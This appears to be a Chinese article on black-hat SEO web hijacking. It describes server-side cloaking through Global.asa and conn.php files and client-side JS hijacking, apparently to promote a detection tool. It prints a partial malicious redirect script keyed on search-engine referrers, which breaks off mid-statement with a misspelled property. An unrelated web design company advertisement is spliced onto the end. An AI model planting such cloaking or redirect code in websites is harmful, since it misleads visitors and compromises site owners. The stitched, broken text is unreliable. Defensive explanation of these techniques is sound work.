網(wǎng)頁劫持是目前黑帽SEO或者說黑產(chǎn)最喜歡的一種網(wǎng)頁引流方式,此手法往往通過***政府、教育機(jī)構(gòu)網(wǎng)站(權(quán)重高),修改網(wǎng)站源代碼、放寄生蟲程序、設(shè)置二級目錄反向代理等實(shí)現(xiàn)。網(wǎng)頁劫持可以分為服務(wù)端劫持、客戶端劫持、百度快照劫持、百度搜索劫持等等;表現(xiàn)形式可以是劫持跳轉(zhuǎn),也可以是劫持呈現(xiàn)的網(wǎng)頁內(nèi)容,目前被廣泛應(yīng)用于×××等暴利行業(yè)。
在iis7網(wǎng)站劫持檢測中,這些問題可以比較清楚的檢查出來,從而幫助我們更加清晰的知道要解決什么問題。
服務(wù)端劫持
服務(wù)端劫持也稱為全局劫持,手法為修改網(wǎng)站動(dòng)態(tài)語言文本,判斷訪問來源控制返回內(nèi)容,從來達(dá)到網(wǎng)站劫持的目的。
asp/aspx/php劫持
Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執(zhí)行一個(gè)動(dòng)態(tài)腳本的時(shí)候,都會(huì)先加載該腳本, 然后再執(zhí)行目標(biāo)腳本。所以只要在 Global.asa 中寫判斷用戶系統(tǒng)信息的代碼(訪問來源等),如果是蜘蛛訪問則返回關(guān)鍵詞網(wǎng)頁(想要推廣的網(wǎng)站),如果是用戶訪問,則返回正常頁面。
客戶端劫持
客戶端劫持的手法也很多,但主要就是2種:js劫持、Header劫持。
js劫持
js劫持目的:通過向目標(biāo)網(wǎng)頁植入惡意js代碼,控制網(wǎng)站跳轉(zhuǎn)、隱藏頁面內(nèi)容、窗口劫持等。
js植入手法:可以通過***服務(wù)器,直接寫入源代碼中;也可以寫在數(shù)據(jù)庫中,因?yàn)橛行╉撁鏁?huì)呈現(xiàn)數(shù)據(jù)庫內(nèi)容。
js劫持案例
效果:通過搜索引擎搜索點(diǎn)擊頁面(執(zhí)行一段js)跳轉(zhuǎn)到×××頁面;直接輸入網(wǎng)址訪問網(wǎng)頁,跳轉(zhuǎn)到404頁面。
代碼:
today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(.[a-z0-9-]+){1,2}\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('
成都創(chuàng)新互聯(lián)網(wǎng)絡(luò)公司擁有十余年的成都網(wǎng)站開發(fā)建設(shè)經(jīng)驗(yàn),近千家客戶的共同信賴。提供成都做網(wǎng)站、成都網(wǎng)站建設(shè)、網(wǎng)站開發(fā)、網(wǎng)站定制、買友情鏈接、建網(wǎng)站、網(wǎng)站搭建、成都響應(yīng)式網(wǎng)站建設(shè)公司、網(wǎng)頁設(shè)計(jì)師打造企業(yè)風(fēng)格,提供周到的售前咨詢和貼心的售后服務(wù)